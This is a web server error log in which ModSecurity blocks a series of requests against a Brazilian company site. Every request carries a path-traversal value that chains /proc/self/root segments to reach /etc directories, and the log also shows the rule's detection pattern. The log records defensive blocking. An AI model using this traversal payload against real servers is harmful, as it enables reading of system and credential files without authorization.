[Fri Mar 20 06:37:29.435015 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.243.128:50620] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VWda6ubjKNq_cu4bCGwAAA1E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:37:30.714960 2026] [:error] [pid 26799:tid 140411590858496] [client 74.7.243.128:50632] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VWta6ubjKNq_cu4bCHwAAA1I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:37:31.584419 2026] [:error] [pid 31215:tid 140411716749056] [client 74.7.241.31:55618] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VWwF0L0L-SsrnPo5W3QAAAsM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:37:32.888177 2026] [:error] [pid 21219:tid 140411725141760] [client 74.7.241.31:55626] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VXPXLqtnMIWvjpaKJgQAAAoI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:37:33.063155 2026] [:error] [pid 7893:tid 140411674785536] [client 74.7.243.128:50642] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VXRCii7xarUs8iHZXhgAAAgg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:37:34.200021 2026] [:error] [pid 11642:tid 140411741927168] [client 74.7.241.31:55634] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VXrninkcc-iUj5ApN0gAAA4A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:37:34.330680 2026] [:error] [pid 9818:tid 140411658000128] [client 74.7.243.128:50652] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VXl1pVZ5mVmJwsFMfLgAAAEo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:37:37.416023 2026] [:error] [pid 15826:tid 140411590858496] [client 74.7.241.31:55648] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VYeoXxyEfFpUF8f9xNAAAAVI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:37:37.735503 2026] [:error] [pid 9818:tid 140411699963648] [client 74.7.243.128:50654] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VYV1pVZ5mVmJwsFMfMQAAAEU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:37:38.746900 2026] [:error] [pid 9818:tid 140411624429312] [client 74.7.241.31:36394] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VYl1pVZ5mVmJwsFMfMgAAAE4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:37:39.070537 2026] [:error] [pid 15826:tid 140411741927168] [client 74.7.243.128:50668] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VY-oXxyEfFpUF8f9xOAAAAUA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:37:39.918180 2026] [:error] [pid 15826:tid 140411708356352] [client 74.7.241.31:36408] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VY-oXxyEfFpUF8f9xOQAAAUQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:37:41.203407 2026] [:error] [pid 15826:tid 140411725141760] [client 74.7.241.31:36420] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VZeoXxyEfFpUF8f9xOwAAAUI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:37:46.295990 2026] [:error] [pid 10189:tid 140411616036608] [client 74.7.243.128:36874] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VajJ3M9BSuKP7CAYHZQAAAI8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:37:46.559892 2026] [:error] [pid 31215:tid 140411666392832] [client 74.7.241.31:36424] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VagF0L0L-SsrnPo5W7gAAAsk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:37:47.867239 2026] [:error] [pid 10189:tid 140411548894976] [client 74.7.241.31:49618] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VazJ3M9BSuKP7CAYHZgAAAJc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:37:49.162464 2026] [:error] [pid 31215:tid 140411624429312] [client 74.7.241.31:49632] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VbQF0L0L-SsrnPo5W8QAAAs4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:37:51.480566 2026] [:error] [pid 7893:tid 140411624429312] [client 74.7.241.31:49648] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VbxCii7xarUs8iHZXnAAAAg4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:37:52.813092 2026] [:error] [pid 7235:tid 140411716749056] [client 74.7.241.31:49654] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VcPqxLDW4GITHUkTUnwAAAQM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:37:55.176433 2026] [:error] [pid 7235:tid 140411590858496] [client 74.7.241.31:49664] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Vc_qxLDW4GITHUkTUogAAARI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:37:56.244200 2026] [:error] [pid 7893:tid 140411599251200] [client 74.7.243.128:36890] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VdBCii7xarUs8iHZXoQAAAhE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
